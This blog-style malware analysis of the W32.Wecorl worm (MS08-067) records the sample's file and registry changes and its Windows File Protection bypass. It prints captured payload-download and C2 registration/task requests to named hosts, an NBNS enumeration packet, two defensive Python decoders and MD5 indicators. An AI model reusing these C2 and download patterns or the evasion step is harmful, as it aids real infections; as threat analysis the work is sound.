Sunday, November 9, 2008

MS08-067 and W32.Wecorl

On 2 November 2008, Symantec reported a "worm" called W32.Wecorl that attempts to exploit the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067). What follows is an analysis of the W32.Wecorl sample 10wrjcenew.exe.

In a lab test, the malware 10wrjcenew.exe:

Created C:\DOCUME~1\%user profile%\LOCALS~1\Temp\Install.2008.dat
Deleted C:\WINDOWS\System32\Dllcache\Svchost.exe
Modified C:\WINDOWS\System32\Svchost.exe
Created C:\WINDOWS\system32\7DBF6DA4

The order of the Svchost.exe operations matters: Windows File Protection restores a tampered system file from the Dllcache copy, so deleting the cached copy first prevents the modified Svchost.exe from being silently replaced.

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Google "[MAC ADDRESS]"
Type: REG_BINARY
Data: (data too large: 3584 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Licenses "[MAC ADDRESS]"
Type: REG_BINARY
Data: [HEXADECIMAL DATA]

The malware then downloaded mimi.1268772 from ls.cc86.info (121.12.172.44, CN) and pp.gif from blog-imgs-27.fc2.com (208.71.107.52, US):

GET /mimi.1268772 HTTP/1.1
Host: ls.cc86.info

GET /u/f/o/ufo2000sgd/pp.gif HTTP/1.1
Host: blog-imgs-27.fc2.com

The malware also sent the following datagram to UDP port 137 on a 121.x.x.x host (the destination address in the dump decodes to 121.12.172.44, the same host that served mimi.1268772). Although the sample's purpose is to exploit MS08-067, this packet is not the overflow itself: MS08-067 is reached through the Server service's MSRPC interface over SMB (TCP 445 or 139). What is shown here is a NetBIOS Name Service node status request (NBSTAT, query type 0x21) for the wildcard name "*", whose first-level encoding is the CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA string visible in the ASCII column. This is the usual way to identify Windows hosts and their NetBIOS names before attacking them.

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..
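To check that reading of the capture, the decoder below (an added example, not code from the original post) rebuilds the frame from the hex dump exactly as printed above, walks Ethernet, IPv4 and UDP, and decodes the NBNS question including the first-level name encoding. The only packet-specific piece is the embedded dump; the parser itself works for any NBNS query.

```python
"""Decode the UDP/137 datagram from the capture above.

Added example, not part of the original post. The packet bytes are copied
from the hex dump; the decoder is generic for NetBIOS Name Service queries.
"""
import struct

# The capture as printed above (offset, up to 16 hex bytes, ASCII column).
HEXDUMP = """\
0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..
"""

NBNS_TYPES = {0x20: "NB", 0x21: "NBSTAT"}
HEXDIGITS = set("0123456789abcdefABCDEF")


def hexdump_to_bytes(dump):
    """Rebuild raw bytes from 'offset hh hh ... ascii' lines.

    Only two-character hex tokens after the offset are data; the first token
    that is not one belongs to the variable-width ASCII column.
    """
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.split()[1:17]:          # drop offset, max 16 bytes/line
            if len(tok) != 2 or not set(tok) <= HEXDIGITS:
                break
            out.append(int(tok, 16))
    return bytes(out)


def decode_nbns_name(encoded):
    """Reverse NetBIOS first-level encoding: each nibble is sent as 'A' + nibble."""
    raw = bytearray()
    for hi, lo in zip(encoded[0::2], encoded[1::2]):
        raw.append(((hi - ord("A")) << 4) | (lo - ord("A")))
    return bytes(raw)


def parse_frame(frame):
    """Ethernet -> IPv4 -> UDP -> NBNS question section. Returns a summary dict."""
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not IPv4")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 17:
        raise ValueError("not UDP")
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    udp = ip[ihl:]
    sport, dport, ulen = struct.unpack("!HHH", udp[:6])
    payload = udp[8:ulen]
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", payload[:12])
    # Question: length byte, encoded label, 0x00 terminator, QTYPE, QCLASS.
    pos = 12
    label_len = payload[pos]
    encoded = payload[pos + 1:pos + 1 + label_len]
    pos += 1 + label_len + 1                    # skip the terminating zero label
    qtype, qclass = struct.unpack("!HH", payload[pos:pos + 4])
    raw_name = decode_nbns_name(encoded)        # 15 name bytes + 1 suffix byte
    return {
        "src": src, "dst": dst, "sport": sport, "dport": dport,
        "txid": txid, "is_query": (flags & 0x8000) == 0,
        "opcode": (flags >> 11) & 0xF, "qdcount": qd,
        "encoded_name": encoded.decode("ascii"),
        "name": raw_name[:15].rstrip(b"\x00").decode("ascii", "replace"),
        "suffix": raw_name[15],
        "qtype": NBNS_TYPES.get(qtype, hex(qtype)), "qclass": qclass,
    }


def classify(frame):
    """An NBSTAT query for '*' is host enumeration, not an MSRPC exploit attempt."""
    q = parse_frame(frame)
    if q["dport"] == 137 and q["is_query"] and q["qtype"] == "NBSTAT" and q["name"] == "*":
        return "NBNS node-status (NBSTAT) wildcard query: host enumeration"
    return "other NBNS traffic"


if __name__ == "__main__":
    frame = hexdump_to_bytes(HEXDUMP)
    for key, value in parse_frame(frame).items():
        print(f"{key:>13}: {value}")
    print(classify(frame))
```

Running it shows source 192.168.0.13, destination 121.12.172.44, ports 137/137, transaction ID 0x8013, a query with opcode 0 and one question for name "*" (suffix 0x00), type NBSTAT, class IN.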

The malware then registers with ce.10wrj.com (218.95.101.68, CN) via ClientReg.aspx and fetches C2 instructions from ClientTask.aspx, identifying itself in both requests by MAC address plus Type and Sn values. In the captured session the task response directs it to download ce.10wrj.com/nb1103.exe.

GET /ClientReg.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com

HTTP/1.1 200 OK

xxyysign xxyyMyIP=xx.xx.xx.xx



GET /ClientTask.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com

HTTP/1.1 200 OK

xxyysign
xxyyUserNamePassWord=CeUser:CePassWord
xxyyPort=0
xxyyUpdata=http://ce.10wrj.com/nb1103.exe*
xxyyRemoteHost=
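The check-in format is simple enough to decode from the two captured bodies alone. The parser below is an added example, not code from the original post or from the malware: it splits a response on the xxyy marker, treats bare tokens (sign) as flags and key=value tokens as fields, and recognises the ClientReg/ClientTask request lines so a proxy log can be searched for the same check-in. Treating the trailing "*" after the Updata URL as a value terminator is an assumption based only on the single sample above.

```python
"""Parse the ce.10wrj.com registration/task exchange shown above.

Added example, not code from the original post or from the malware. The
format is inferred from the two captured bodies; the '*' terminator after
the Updata value is an assumption.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Bodies copied from the capture above (client IP masked as in the post).
REG_RESPONSE = "xxyysign xxyyMyIP=xx.xx.xx.xx"
TASK_RESPONSE = """xxyysign
xxyyUserNamePassWord=CeUser:CePassWord
xxyyPort=0
xxyyUpdata=http://ce.10wrj.com/nb1103.exe*
xxyyRemoteHost=
"""

CHECKIN_PATHS = {"/ClientReg.aspx": "ClientReg", "/ClientTask.aspx": "ClientTask"}


def parse_response(body):
    """Split on the 'xxyy' marker: bare tokens are flags, k=v tokens are fields."""
    flags, fields = [], {}
    for tok in body.split("xxyy")[1:]:
        tok = tok.strip()
        if not tok:
            continue
        if "=" in tok:
            key, value = tok.split("=", 1)
            fields[key] = value.rstrip("*")   # assumption: trailing '*' ends a value
        else:
            flags.append(tok)
    return flags, fields


def is_signed(body):
    """The server prefixes every body with an 'xxyysign' flag."""
    return "sign" in parse_response(body)[0]


def update_url(body):
    """URL of the next stage, if the task response carries one."""
    return parse_response(body)[1].get("Updata") or None


def parse_checkin(request_line):
    """Recognise a ClientReg/ClientTask request line and pull out its identifiers."""
    m = re.match(r"GET\s+(\S+)\s+HTTP/1\.[01]", request_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path not in CHECKIN_PATHS:
        return None
    qs = parse_qs(url.query)
    first = lambda k: qs.get(k, [""])[0]
    return {"endpoint": CHECKIN_PATHS[url.path], "mac": first("mac"),
            "type": first("Type"), "sn": first("Sn")}


if __name__ == "__main__":
    print(parse_checkin("GET /ClientReg.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1"))
    print(parse_response(REG_RESPONSE))
    print(parse_response(TASK_RESPONSE))
    print("next stage:", update_url(TASK_RESPONSE))
```

Matching on the two .aspx paths together with the mac/Type/Sn query keys is a tighter indicator than the domain alone, since the same C2 host also serves the plain nb1103.exe download.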

The following files were observed during analysis (size in bytes, MD5, name):

10752 f01fd7ecfce8af65832a3a57d2789fa6 10wrjcenew.exe
12800 0f7d9c87b0ce1fa520473119752c6f79 3EDFB6D2
900 14c9db2b8177ca199f283e644fcda225 mimi.1268772
404992 0fdb364e8666140d4570d24f363d26d5 nb1103.exe
258048 944b1a83ee17db7fa779a2e7d970768c pp.gif
